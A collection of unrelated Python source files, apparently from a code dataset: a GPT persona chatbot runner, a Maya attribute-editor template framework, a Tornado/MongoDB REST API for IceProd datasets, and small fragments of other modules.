s3.download_file(*fle, 'datasets/persona-chat.json')
# Download model
fle = ('models.huggingface.co', 'transfer-learning-chatbot/finetuned_chatbot_gpt.tar.gz')
s3.download_file(fle, 'models/gpt.tar.gpz')
with tarfile.open('models/gpt.tar.gpz', 'r:gz') as archive: archive.extractall('models')
# Remove tar file
os.remove('models/gpt.tar.gpz')
def _load_models(self):
self.token = OpenAIGPTTokenizer.from_pretrained('models')
self.model = OpenAIGPTLMHeadModel.from_pretrained('models')
def tokenize_personnalities(self):
with open('datasets/persona-chat.json', encoding='utf-8') as f:
dtb = json.loads(f.read())
def tokenize(obj):
if isinstance(obj, str):
return self.token.convert_tokens_to_ids(self.token.tokenize(obj))
if isinstance(obj, dict):
return dict((n, tokenize(o)) for n, o in obj.items())
return list(tokenize(o) for o in obj)
dtb = tokenize(dtb)
torch.save(dtb, 'datasets/persona-cached')
class Trigger:
def __init__(self):
self.url_jokes = 'https://icanhazdadjoke.com'
self.url_facts = 'https://some-random-api.ml/facts'
def get(self, message):
if 'joke' in message:
return requests.get(self.url_jokes, headers={"Accept":"application/json"}).json()['joke']
elif ('fun' in message) and ('fact' in message):
animal = np.random.choice(['panda', 'cat', 'dog', 'fox', 'bird', 'koala'])
return json.loads(requests.get('/'.join([self.url_facts, animal])).content)['fact']
else: return ''
class Runner:
SPECIAL_TOKENS = ["<bos>", "<eos>", "<speaker1>", "<speaker2>", "<pad>"]
def __init__(self, directory='models'):
self.hists = []
self.trigs = Trigger()
self.token = OpenAIGPTTokenizer.from_pretrained(directory)
self.model = OpenAIGPTLMHeadModel.from_pretrained(directory)
def set_background(self, characteristics):
self.perso = [self.token.convert_tokens_to_ids(self.token.tokenize(e)) for e in characteristics]
def read_background(self):
for e in self.token.decode(chain(*self.perso)): print('-', e)
def input_from_segments(self, history, reply):
bos, eos, speaker1, speaker2 = self.token.convert_tokens_to_ids(self.SPECIAL_TOKENS[:-1])
instance = {}
sequence = [[bos] + list(chain(*self.perso))] + history + [reply]
sequence = [sequence[0]] + [[speaker2 if (len(sequence)-i) % 2 else speaker1] + s for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [speaker2 if i % 2 else speaker1 for i, s in enumerate(sequence) for _ in s]
instance["mc_token_ids"] = len(instance["input_ids"]) - 1
instance["lm_labels"] = [-1] * len(instance["input_ids"])
return instance, sequence
@staticmethod
def top_filtering(logits, top_k=0, top_p=0.9, threshold=-float('Inf'), filter_value=-float('Inf')):
assert logits.dim() == 1
top_k = min(top_k, logits.size(-1))
if top_k > 0:
# Remove all tokens with a probability less than the last token in the top-k tokens
indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]
logits[indices_to_remove] = filter_value
if top_p > 0.0:
# Compute cumulative probabilities of sorted tokens
sorted_logits, sorted_indices = torch.sort(logits, descending=True)
cumulative_probabilities = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)
# Remove tokens with cumulative probability above the threshold
sorted_indices_to_remove = cumulative_probabilities > top_p
# Shift the indices to the right to keep also the first token above the threshold
sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()
sorted_indices_to_remove[..., 0] = 0
# Back to unsorted indices and set them to -infinity
indices_to_remove = sorted_indices[sorted_indices_to_remove]
logits[indices_to_remove] = filter_value
indices_to_remove = logits < threshold
logits[indices_to_remove] = filter_value
return logits
def sample_sequence(self, history, min_length=1, max_length=30, temperature=0.7, current_output=None):
special_tokens_ids = self.token.convert_tokens_to_ids(self.SPECIAL_TOKENS)
if current_output is None: current_output = []
for i in range(max_length):
instance, sequence = self.input_from_segments(history, current_output)
input_ids = torch.tensor(instance["input_ids"], device='cpu').unsqueeze(0)
token_type_ids = torch.tensor(instance["token_type_ids"], device='cpu').unsqueeze(0)
logits = self.model(input_ids, token_type_ids=token_type_ids)
logits = logits[0, -1, :] / temperature
logits = self.top_filtering(logits)
probs = F.softmax(logits, dim=-1)
prev = torch.multinomial(probs, 1)
if i < 1 and prev.item() in special_tokens_ids:
while prev.item() in special_tokens_ids:
prev = torch.multinomial(probs, num_samples=1)
if prev.item() in special_tokens_ids: break
current_output.append(prev.item())
return current_output
def answer(self, message, time=4):
self.hists.append(self.token.encode(message))
with torch.no_grad(): out_ids = self.sample_sequence(self.hists)
response = self.token.decode(out_ids, skip_special_tokens=True)
response = ' '.join([response, self.trigs.get(message)])
self.hists.append(self.token.encode(response))
self.hists = self.hists[-time:]
return response
| 6,878 | 2,181 |
# encoding=utf-8
import re
#
import types
# noinspection PyUnresolvedReferences
import maya.mel as mel
# noinspection PyUnresolvedReferences
import maya.cmds as cmds
#
_objectStore = {}
#
def pyToMelProc(pyObj, args=(), returnType=None, procName=None, useName=False, procPrefix='pyToMel_'):
melParams = []
pyParams = []
melReturn = returnType if returnType else ''
#
for t, n in args:
melParams.append('%s $%s' % (t, n))
#
if t == 'string':
pyParams.append(r"""'"+$%s+"'""" % n)
else:
pyParams.append(r'"+$%s+"' % n)
#
objId = id(pyObj)
#
d = {}
#
if procName:
d['procName'] = procName
elif useName:
d['procName'] = pyObj.__name__
else:
if isinstance(pyObj, types.LambdaType):
procPrefix += '_lambda'
elif isinstance(pyObj, (types.FunctionType, types.BuiltinFunctionType)):
try:
procPrefix += '_' + pyObj.__name__
except (AttributeError, TypeError):
pass
elif isinstance(pyObj, types.MethodType):
try:
procPrefix += '_' + pyObj.im_class.__name__ + '_' + pyObj.__name__
except (AttributeError, TypeError):
pass
d['procName'] = '%s%s' % (procPrefix, objId)
#
d['procName'] = d['procName'].replace('<', '_').replace('>', '_').replace('-', '_')
d['melParams'] = ', '.join(melParams)
d['pyParams'] = ', '.join(pyParams)
d['melReturn'] = melReturn
d['thisModule'] = __name__
d['id'] = objId
#
contents = '''global proc %(melReturn)s %(procName)s(%(melParams)s){'''
if melReturn:
contents += 'return '
contents += '''python("import %(thisModule)s;%(thisModule)s._objectStore[%(id)s](%(pyParams)s)");}'''
mel.eval(contents % d)
_objectStore[objId] = pyObj
return d['procName']
#
def capitalize(s):
return s[0].upper() + s[1:] if s else s
#
def prettify(s):
return ' '.join([capitalize(x) for x in re.findall('[a-zA-Z][a-z]*[0-9]*', s)])
#
def toCamelCase(s):
parts = s.split('_')
return ''.join([parts[0]] + [capitalize(x) for x in parts[1:]])
#
def aeCallback(func):
return pyToMelProc(func, [('string', 'nodeName')], procPrefix='AECallback')
#
def attrTextFieldGrp(*args, **kwargs):
attribute = kwargs.pop('attribute', kwargs.pop('a', None))
assert attribute is not None, "You Must Passed an Attribute"
#
changeCommand = kwargs.pop('changeCommand', kwargs.pop('cc', None))
if changeCommand:
# noinspection PyCallingNonCallable
def cc(newVal):
cmds.setAttr(attribute, newVal, type="string")
changeCommand(newVal)
else:
def cc(newVal):
cmds.setAttr(attribute, newVal, type="string")
#
if kwargs.pop('edit', kwargs.pop('e', False)):
ctrl = args[0]
cmds.textFieldGrp(
ctrl,
edit=True,
text=cmds.getAttr(attribute),
changeCommand=cc
)
cmds.scriptJob(
parent=ctrl,
replacePrevious=True,
attributeChange=[attribute, lambda: cmds.textFieldGrp(ctrl, edit=True, text=cmds.getAttr(attribute))]
)
elif kwargs.pop('query', kwargs.pop('q', False)):
pass
else:
labelText = kwargs.pop('label', None)
if not labelText:
labelText = mel.eval('interToUI(\"{}\")'.format(attribute.split('.')[-1]))
#
ctrl = None
if len(args) > 0:
ctrl = args[0]
cmds.textFieldGrp(
ctrl,
label=labelText,
text=cmds.getAttr(attribute),
changeCommand=cc
)
else:
ctrl = cmds.textFieldGrp(
label=labelText,
text=cmds.getAttr(attribute),
changeCommand=cc
)
#
cmds.scriptJob(
parent=ctrl,
attributeChange=[attribute, lambda: cmds.textFieldGrp(ctrl, edit=True, text=cmds.getAttr(attribute))]
)
return ctrl
#
def attrType(attr):
t = cmds.getAttr(attr, type=True)
if t == 'float3':
node, at = attr.split('.', 1)
if cmds.attributeQuery(at, node=node, usedAsColor=1):
t = 'color'
return t
#
def modeMethod(func):
def wrapped(self, *args, **kwargs):
modeFunc = getattr(self._mode, func.__name__)
if self._record:
self._actions.append((modeFunc, args, kwargs))
else:
modeFunc(*args, **kwargs)
#
wrapped.__doc__ = func.__doc__
wrapped.__name__ = func.__name__
wrapped._orig = func
return wrapped
#
def modeAttrMethod(func):
def wrapped(self, attr, *args, **kwargs):
assert isinstance(attr, basestring), "%r.%s: attr argument must be a string, got %s" % (self, func.__name__, type(attr).__name__)
modeFunc = getattr(self._mode, func.__name__)
if self.convertToMayaStyle:
attr = toCamelCase(attr)
if self._record:
self._actions.append((modeFunc, (attr,) + args, kwargs))
else:
modeFunc(attr, *args, **kwargs)
self._attributes.append(attr)
#
wrapped.__doc__ = func.__doc__
wrapped.__name__ = func.__name__
wrapped._orig = func
return wrapped
#
def swatchLabel(nodeName):
nodeType = cmds.nodeType(nodeName)
classificationsList = cmds.getClassification(nodeType)
for classification in classificationsList:
allClassList = classification.split(':')
for allClass in allClassList:
classList = allClass.split('/')
if 'swatch' == classList[0]:
continue
else:
if classList:
if 'shader' != classList[-1]:
classList = filter(lambda x: x != 'shader', classList)
return "\n".join(map(lambda x: x.capitalize(), classList))
else:
return "Sample"
#
def swatchDisplayNew(plugName):
nodeAndAttrs = plugName.split(".")
node = nodeAndAttrs[0]
cmds.formLayout('swatchDisplayForm')
cmds.text('swatchLabel', label=swatchLabel(node))
cmds.swatchDisplayPort('swatchDisplay', wh=(64, 64), rs=64)
#
cmds.popupMenu('swatchPopup', button=3)
cmds.menuItem('swatchSmall', label='Small')
cmds.menuItem('swatchMedium', label='Medium')
cmds.menuItem('swatchLarge', label='Large')
#
cmds.setParent(upLevel=True)
gTextColumnWidthIndex = mel.eval("$tempVar=$gTextColumnWidthIndex;")
cmds.formLayout(
'swatchDisplayForm',
edit=True,
af=[
('swatchLabel', "top", 0),
('swatchLabel', "bottom", 0),
('swatchDisplay', "top", 0),
('swatchDisplay', "bottom", 0)
],
aof=[
('swatchLabel', "right", -gTextColumnWidthIndex)
],
an=[
('swatchLabel', "left"),
('swatchDisplay', "right")
],
ac=[
('swatchDisplay', "left", 5, 'swatchLabel')
]
)
swatchDisplayReplace(plugName)
#
def swatchDisplayReplace(plugName):
nodeAndAttrs = plugName.split(".")
node = nodeAndAttrs[0]
#
cmds.swatchDisplayPort(
'swatchDisplay',
edit=True,
shadingNode=node,
annotation='Refresh Swatch',
pressCommand=lambda *args: mel.eval("updateFileNodeSwatch " + node)
)
cmds.popupMenu('swatchPopup', edit=True, button=3)
cmds.menuItem(
'swatchSmall',
edit=True,
command=lambda *args: cmds.swatchDisplayPort('swatchDisplay', edit=True, wh=(64, 64), rs=64)
)
cmds.menuItem(
'swatchMedium',
edit=True,
command=lambda *args: cmds.swatchDisplayPort('swatchDisplay', edit=True, wh=(96, 96), rs=96)
)
cmds.menuItem(
'swatchLarge',
edit=True,
command=lambda *args: cmds.swatchDisplayPort('swatchDisplay', edit=True, wh=(128, 128), rs=128)
)
cmds.text('swatchLabel', edit=True, label=swatchLabel(node))
#
class baseMode(object):
def __init__(self, template):
self.template = template
@property
def nodeName(self):
return self.template.nodeName
@property
def attr(self):
return self.template.attr
#
def nodeType(self):
self.template.nodeType()
#
def nodeAttr(self, attr):
return self.template.nodeAttr(attr)
#
def nodeAttrExists(self, attr):
return self.template.nodeAttrExists(attr)
#
class rootMode(baseMode):
def __init__(self, template):
super(rootMode, self).__init__(template)
#
self._attr = None
#
self._nodeName = None
self._type = self.template.nodeType()
#
def _updateCallback(self, nodeAttr):
self.template._doUpdate(nodeAttr.split('.')[0])
#
def preSetup(self):
self.addCustom('message', self._updateCallback, self._updateCallback)
#
def postSetup(self):
pass
#
def update(self):
pass
#
def addTemplate(self, attr, template):
if template._isRootMode():
template._doSetup(self.nodeAttr(attr))
else:
self.addChildTemplate(attr, template)
@staticmethod
def addChildTemplate(attr, template):
template._setToChildMode()
template._record = True
template.setup()
for attr in template._attributes:
try:
cmds.editorTemplate(suppress=attr)
except RuntimeError:
pass
cmds.editorTemplate(
aeCallback(template._doSetup),
aeCallback(template._doUpdate),
attr,
callCustom=True
)
@staticmethod
def addControl(attr, label=None, changeCommand=None, annotation=None, preventOverride=False, dynamic=False, enumeratedItem=None):
if not label:
label = prettify(attr)
#
args = [attr]
kwargs = {}
#
if dynamic:
kwargs['addDynamicControl'] = True
else:
kwargs['addControl'] = True
if changeCommand:
if hasattr(changeCommand, '__call__'):
changeCommand = aeCallback(changeCommand)
args.append(changeCommand)
if label:
kwargs['label'] = label
if annotation:
kwargs['annotation'] = annotation
cmds.editorTemplate(*args, **kwargs)
@staticmethod
def suppress(attr):
cmds.editorTemplate(suppress=attr)
@staticmethod
def addCustom(attr, newFunc, replaceFunc):
if hasattr(newFunc, '__call__'):
newFunc = aeCallback(newFunc)
if hasattr(replaceFunc, '__call__'):
replaceFunc = aeCallback(replaceFunc)
args = (newFunc, replaceFunc, attr)
cmds.editorTemplate(callCustom=1, *args)
@staticmethod
def addSeparator():
cmds.editorTemplate(addSeparator=True)
@staticmethod
def dimControl(nodeName, control, state):
cmds.editorTemplate(dimControl=(nodeName, control, state))
@staticmethod
def beginLayout(name, collapse=True):
cmds.editorTemplate(beginLayout=name, collapse=collapse)
@staticmethod
def endLayout():
cmds.editorTemplate(endLayout=True)
@staticmethod
def beginScrollLayout():
cmds.editorTemplate(beginScrollLayout=True)
@staticmethod
def endScrollLayout():
cmds.editorTemplate(endScrollLayout=True)
@staticmethod
def beginNoOptimize():
cmds.editorTemplate(beginNoOptimize=True)
@staticmethod
def endNoOptimize():
cmds.editorTemplate(endNoOptimize=True)
@staticmethod
def interruptOptimize():
cmds.editorTemplate(interruptOptimize=True)
@staticmethod
def addComponents():
cmds.editorTemplate(addComponents=True)
@staticmethod
def addExtraControls(label=None):
kwargs = {}
if label:
kwargs['extraControlsLabel'] = label
cmds.editorTemplate(addExtraControls=True, **kwargs)
#
class AttrControlGrp(object):
uiTypeDic = {
'float': cmds.attrFieldSliderGrp,
'float2': cmds.attrFieldGrp,
'float3': cmds.attrFieldGrp,
'color': cmds.attrColorSliderGrp,
'bool': cmds.attrControlGrp,
'long': cmds.attrFieldSliderGrp,
'byte': cmds.attrFieldSliderGrp,
'long2': cmds.attrFieldGrp,
'long3': cmds.attrFieldGrp,
'short': cmds.attrFieldSliderGrp,
'short2': cmds.attrFieldGrp,
'short3': cmds.attrFieldGrp,
'enum': cmds.attrEnumOptionMenuGrp,
'double': cmds.attrFieldSliderGrp,
'double2': cmds.attrFieldGrp,
'double3': cmds.attrFieldGrp,
'string': attrTextFieldGrp,
'message': cmds.attrNavigationControlGrp
}
def __init__(self, attribute, *args, **kwargs):
self.attribute = attribute
self.type = kwargs.pop('type', kwargs.pop('typ', None))
if not self.type:
self.type = attrType(self.attribute)
if self.type in ['color', 'enum', 'message']:
self.callback = kwargs.pop('changeCommand', None)
else:
self.callback = None
kwargs['attribute'] = self.attribute
if self.type not in self.uiTypeDic:
return
cmd = self.uiTypeDic[self.type]
try:
self.control = cmd(*args, **kwargs)
except RuntimeError:
print "Error creating %s:" % cmd.__name__
raise
if self.callback:
cmds.scriptJob(
attributeChange=[self.attribute, self.callback],
replacePrevious=True,
parent=self.control
)
#
def edit(self, **kwargs):
kwargs['edit'] = True
if self.type not in self.uiTypeDic:
return
self.uiTypeDic[self.type](self.control, **kwargs)
#
def setAttribute(self, attribute):
self.attribute = attribute
if self.type not in self.uiTypeDic:
return
self.uiTypeDic[self.type](self.control, edit=True, attribute=self.attribute)
if self.callback:
cmds.scriptJob(
attributeChange=[self.attribute, self.callback],
replacePrevious=True,
parent=self.control
)
#
class childMode(baseMode):
def __init__(self, template):
super(childMode, self).__init__(template)
self._controls = []
self._layoutStack = []
#
def preSetup(self):
cmds.setUITemplate('attributeEditorTemplate', pushTemplate=True)
self._layoutStack = [cmds.setParent(query=True)]
@staticmethod
def postSetup():
cmds.setUITemplate(popTemplate=True)
#
def update(self):
cmds.setUITemplate('attributeEditorTemplate', pushTemplate=True)
try:
for attr, updateFunc, parent in self._controls:
cmds.setParent(parent)
updateFunc(self.nodeAttr(attr))
except:
print("Template %r Failed to Update Attribute '%s'" % (self.template, self.attr))
raise
finally:
cmds.setUITemplate(popTemplate=True)
#
def addTemplate(self, attr, template):
self.addChildTemplate(attr, template)
#
def addChildTemplate(self, attr, template):
template._setToChildMode()
template._record = True
template.setup()
for attr in template._attributes:
try:
cmds.editorTemplate(suppress=attr)
except RuntimeError:
pass
self.addCustom(attr, template._doSetup, template._doUpdate)
#
def addControl(self, attr, label=None, changeCommand=None, annotation=None, preventOverride=False, dynamic=False, enumeratedItem=None):
if not label:
label = prettify(attr)
#
kwargs = {'label': label, 'attribute': self.nodeAttr(attr)}
if annotation:
kwargs['annotation'] = annotation
if changeCommand:
kwargs['changeCommand'] = changeCommand
if enumeratedItem:
kwargs['enumeratedItem'] = enumeratedItem
parent = self._layoutStack[-1]
cmds.setParent(parent)
control = AttrControlGrp(**kwargs)
self._controls.append((attr, control.setAttribute, parent))
#
def addCustom(self, attr, createFunc, updateFunc):
parent = self._layoutStack[-1]
cmds.setParent(parent)
col = cmds.columnLayout(adj=True)
#
createFunc(self.nodeAttr(attr))
cmds.setParent(parent)
self._controls.append((attr, updateFunc, col))
@staticmethod
def addSeparator():
cmds.separator()
#
def beginLayout(self, label, **kwargs):
kwargs['label'] = label
cmds.setParent(self._layoutStack[-1])
cmds.frameLayout(**kwargs)
self._layoutStack.append(cmds.columnLayout(adjustableColumn=True))
#
def endLayout(self):
self._layoutStack.pop()
cmds.setParent(self._layoutStack[-1])
#
def beginNoOptimize(self):
pass
#
def endNoOptimize(self):
pass
#
def beginScrollLayout(self):
pass
#
def endScrollLayout(self):
pass
#
def addExtraControls(self):
pass
#
class baseTemplate(object):
def __init__(self, nodeType):
self._type = nodeType
self._nodeName = None
self._attr = None
#
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self._type)
@property
def nodeName(self):
return self._nodeName
@property
def attr(self):
return self._attr
#
def nodeType(self):
if self._type is None:
self._type = cmds.objectType(self.nodeName)
return self._type
#
def nodeAttr(self, attr=None):
if attr is None:
attr = self.attr
return self.nodeName + '.' + attr
#
def nodeAttrExists(self, attr):
return cmds.addAttr(self.nodeAttr(attr), q=1, ex=1)
#
class attributeTemplate(baseTemplate):
convertToMayaStyle = False
def __init__(self, nodeType):
super(attributeTemplate, self).__init__(nodeType)
self._rootMode = rootMode(self)
self._childMode = childMode(self)
self._mode = self._rootMode
self._actions = []
self._attributes = []
self._record = False
#
def _setToRootMode(self):
self._mode = self._rootMode
#
def _isRootMode(self):
return self._mode == self._rootMode
#
def _setToChildMode(self):
self._mode = self._childMode
#
def _isChildMode(self):
return self._mode == self._childMode
#
def _setActiveNodeAttr(self, nodeName):
parts = nodeName.split('.', 1)
self._nodeName = parts[0]
if len(parts) > 1:
self._attr = parts[1]
#
def _doSetup(self, nodeAttr):
self._setActiveNodeAttr(nodeAttr)
self._mode.preSetup()
if self._record:
for func, args, kwargs in self._actions:
func(*args, **kwargs)
else:
self.setup()
self._mode.postSetup()
#
def _doUpdate(self, nodeAttr):
self._setActiveNodeAttr(nodeAttr)
self._mode.update()
@modeMethod
def update(self):
pass
@modeAttrMethod
def addTemplate(self, attr, template):
pass
@modeAttrMethod
def addChildTemplate(self, attr, template):
pass
@modeAttrMethod
def addControl(self, attr, label=None, changeCommand=None, annotation=None, preventOverride=False, dynamic=False, enumeratedItem=None):
pass
@modeMethod
def suppress(self, attr):
pass
@modeMethod
def addSeparator(self):
pass
@modeAttrMethod
def addCustom(self, attr, createFunc, updateFunc):
pass
@modeMethod
def beginLayout(self, label, **kwargs):
pass
@modeMethod
def endLayout(self):
pass
@modeMethod
def beginNoOptimize(self):
pass
@modeMethod
def endNoOptimize(self):
pass
@modeMethod
def beginScrollLayout(self):
pass
@modeMethod
def endScrollLayout(self):
pass
@modeMethod
def addExtraControls(self):
pass
#
def addSwatch(self):
self.addCustom("message", swatchDisplayNew, swatchDisplayReplace)
# For Override
def setup(self):
pass
| 20,731 | 6,266 |
from .bubbleio import BubbleIo
| 31 | 12 |
import pandas as pd
def dump(df: pd.DataFrame) -> bytes:
pass
| 68 | 24 |
import logging
import json
import uuid
from collections import defaultdict
import tornado.web
import tornado.httpclient
from tornado.platform.asyncio import to_asyncio_future
import pymongo
import motor
from rest_tools.client import RestClient
from iceprod.server.rest import RESTHandler, RESTHandlerSetup, authorization
from iceprod.server.util import nowstr, dataset_statuses, dataset_status_sort
logger = logging.getLogger('rest.datasets')
def setup(config, *args, **kwargs):
"""
Setup method for Dataset REST API.
Sets up any database connections or other prerequisites.
Args:
config (dict): an instance of :py:class:`iceprod.server.config`.
Returns:
list: Routes for dataset, which can be passed to :py:class:`tornado.web.Application`.
"""
cfg_rest = config.get('rest',{}).get('datasets',{})
db_cfg = cfg_rest.get('database',{})
# add indexes
db = pymongo.MongoClient(**db_cfg).datasets
if 'dataset_id_index' not in db.datasets.index_information():
db.datasets.create_index('dataset_id', name='dataset_id_index', unique=True)
handler_cfg = RESTHandlerSetup(config, *args, **kwargs)
handler_cfg.update({
'database': motor.motor_tornado.MotorClient(**db_cfg).datasets,
})
return [
(r'/datasets', MultiDatasetHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)', DatasetHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/description', DatasetDescriptionHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/status', DatasetStatusHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/priority', DatasetPriorityHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/jobs_submitted', DatasetJobsSubmittedHandler, handler_cfg),
(r'/dataset_summaries/status', DatasetSummariesStatusHandler, handler_cfg),
]
class BaseHandler(RESTHandler):
"""
Base handler for Dataset REST API.
"""
def initialize(self, database=None, **kwargs):
super(BaseHandler, self).initialize(**kwargs)
self.db = database
class MultiDatasetHandler(BaseHandler):
"""
Handle multi-group requests.
"""
@authorization(roles=['admin','client','system','user']) #TODO: figure out how to do auth for each dataset in the list
async def get(self):
"""
Get a dict of datasets.
Params (optional):
status: | separated list of status filters
groups: | separated list of groups to filter on
users: | separated list of users to filter on
keys: | separated list of keys to return for each dataset
Returns:
dict: {<dataset_id>: metadata}
"""
query = {}
status = self.get_argument('status', None)
if status:
query['status'] = {'$in': status.split('|')}
groups = self.get_argument('groups', None)
if groups:
query['group'] = {'$in': groups.split('|')}
users = self.get_argument('users', None)
if users:
query['username'] = {'$in': users.split('|')}
projection = {'_id': False}
keys = self.get_argument('keys', None)
if keys:
projection.update({x:True for x in keys.split('|') if x})
ret = {}
async for row in self.db.datasets.find(query, projection=projection):
k = row['dataset_id']
ret[k] = row
self.write(ret)
self.finish()
@authorization(roles=['admin','user']) # anyone should be able to create a dataset
async def post(self):
"""
Add a dataset.
Body should contain all necessary fields for a dataset.
"""
data = json.loads(self.request.body)
# validate first
req_fields = {
'description': str,
'jobs_submitted': int,
'tasks_submitted': int,
'tasks_per_job': int,
'group': str,
}
for k in req_fields:
if k not in data:
raise tornado.web.HTTPError(400, reason='missing key: '+k)
if not isinstance(data[k], req_fields[k]):
r = 'key "{}" should be of type {}'.format(k, req_fields[k].__name__)
raise tornado.web.HTTPError(400, reason=r)
opt_fields = {
'priority': int,
'debug': bool,
'jobs_immutable': bool,
'status': str,
}
for k in opt_fields:
if k in data and not isinstance(data[k], opt_fields[k]):
r = 'key "{}" should be of type {}'.format(k, opt_fields[k].__name__)
raise tornado.web.HTTPError(400, reason=r)
bad_fields = set(data).difference(set(opt_fields).union(req_fields))
if bad_fields:
r = 'invalid keys found'
raise tornado.web.HTTPError(400, reason=r)
if data['jobs_submitted'] == 0 and data['tasks_per_job'] <= 0:
r = '"tasks_per_job" must be > 0'
raise tornado.web.HTTPError(400, reason=r)
elif data['tasks_submitted'] != 0 and data['tasks_submitted'] / data['jobs_submitted'] != data['tasks_per_job']:
r = '"tasks_per_job" does not match "tasks_submitted"/"jobs_submitted"'
raise tornado.web.HTTPError(400, reason=r)
# generate dataset number
ret = await self.db.settings.find_one_and_update(
{'name': 'dataset_num'},
{'$inc': {'num': 1}},
projection={'num': True, '_id': False},
upsert=True,
return_document=pymongo.ReturnDocument.AFTER)
dataset_num = ret['num']
# set some fields
data['dataset_id'] = uuid.uuid1().hex
data['dataset'] = dataset_num
if 'status' not in data:
data['status'] = 'processing'
data['start_date'] = nowstr()
data['username'] = self.auth_data['username']
if 'priority' not in data:
data['priority'] = 0.5
if 'debug' not in data:
data['debug'] = False
if 'jobs_immutable' not in data:
data['jobs_immutable'] = False
# insert
ret = await self.db.datasets.insert_one(data)
# set auth rules
url = '/auths/'+data['dataset_id']
http_client = RestClient(self.auth_url, token=self.module_auth_key)
auth_data = {
'read_groups':['admin',data['group'],'users'],
'write_groups':['admin',data['group']],
}
logger.info('Authorization header: %s', 'bearer '+self.module_auth_key)
await http_client.request('PUT', url, auth_data)
# return success
self.set_status(201)
self.set_header('Location', '/datasets/'+data['dataset_id'])
self.write({'result': '/datasets/'+data['dataset_id']})
self.finish()
class DatasetHandler(BaseHandler):
"""
Handle dataset requests.
"""
@authorization(roles=['admin','client','system','pilot'], attrs=['dataset_id:read'])
async def get(self, dataset_id):
"""
Get a dataset.
Args:
dataset_id (str): the dataset
Returns:
dict: dataset metadata
"""
ret = await self.db.datasets.find_one({'dataset_id':dataset_id},
projection={'_id':False})
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write(ret)
self.finish()
class DatasetDescriptionHandler(BaseHandler):
"""
Handle dataset description updates.
"""
@authorization(roles=['admin'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset description.
Args:
dataset_id (str): the dataset
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'description' not in data:
raise tornado.web.HTTPError(400, reason='missing description')
elif not isinstance(data['description'],str):
raise tornado.web.HTTPError(400, reason='bad description')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{'description': data['description']}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetStatusHandler(BaseHandler):
"""
Handle dataset status updates.
"""
@authorization(roles=['admin','system','client'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset status.
Args:
dataset_id (str): the dataset
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'status' not in data:
raise tornado.web.HTTPError(400, reason='missing status')
elif data['status'] not in dataset_statuses:
raise tornado.web.HTTPError(400, reason='bad status')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{'status': data['status']}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetPriorityHandler(BaseHandler):
"""
Handle dataset priority updates.
"""
@authorization(roles=['admin','system','client'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset priority.
Args:
dataset_id (str): the dataset
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'priority' not in data:
raise tornado.web.HTTPError(400, reason='missing priority')
elif not isinstance(data['priority'], (int, float)):
raise tornado.web.HTTPError(400, reason='priority is not a number')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{'priority': data['priority']}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetJobsSubmittedHandler(BaseHandler):
"""
Handle dataset jobs_submitted updates.
"""
@authorization(roles=['admin'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset's jobs_submitted.
Only allows increases, if the jobs_immutable flag is not set.
Args:
dataset_id (str): the dataset
Json body:
jobs_submitted (int): the number of jobs submitted
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'jobs_submitted' not in data:
raise tornado.web.HTTPError(400, reason='missing jobs_submitted')
try:
jobs_submitted = int(data['jobs_submitted'])
except Exception:
raise tornado.web.HTTPError(400, reason='jobs_submitted is not an int')
ret = await self.db.datasets.find_one({'dataset_id':dataset_id})
if not ret:
raise tornado.web.HTTPError(404, reason='Dataset not found')
if ret['jobs_immutable']:
raise tornado.web.HTTPError(400, reason='jobs_submitted is immutable')
if ret['jobs_submitted'] > jobs_submitted:
raise tornado.web.HTTPError(400, reason='jobs_submitted must be larger than before')
if 'tasks_per_job' not in ret or ret['tasks_per_job'] <= 0:
raise tornado.web.HTTPError(400, reason='tasks_per_job not valid')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{
'jobs_submitted': jobs_submitted,
'tasks_submitted': int(jobs_submitted*ret['tasks_per_job']),
}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetSummariesStatusHandler(BaseHandler):
"""
Handle dataset summary grouping by status.
"""
@authorization(roles=['admin','system','client','user']) #TODO: figure out how to do auth for each dataset in the list
async def get(self):
"""
Get the dataset summary for all datasets, group by status.
Returns:
dict: {<status>: [<dataset_id>,]}
"""
cursor = self.db.datasets.find(
projection={'_id':False,'status':True,'dataset_id':True})
ret = defaultdict(list)
async for row in cursor:
ret[row['status']].append(row['dataset_id'])
ret2 = {}
for k in sorted(ret, key=dataset_status_sort):
ret2[k] = ret[k]
self.write(ret2)
self.finish()
| 13,152 | 3,924 |
# -*- coding: utf-8 -*-
# author: itimor
import requests
import json
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
class FalconClient(object):
def __init__(self, endpoint=None, user=None, token=None, keys=[], session=None, ssl_verify=True):
self._endpoint = endpoint
self._job_prex = 'job/'
self._url_suffix = 'api/json'
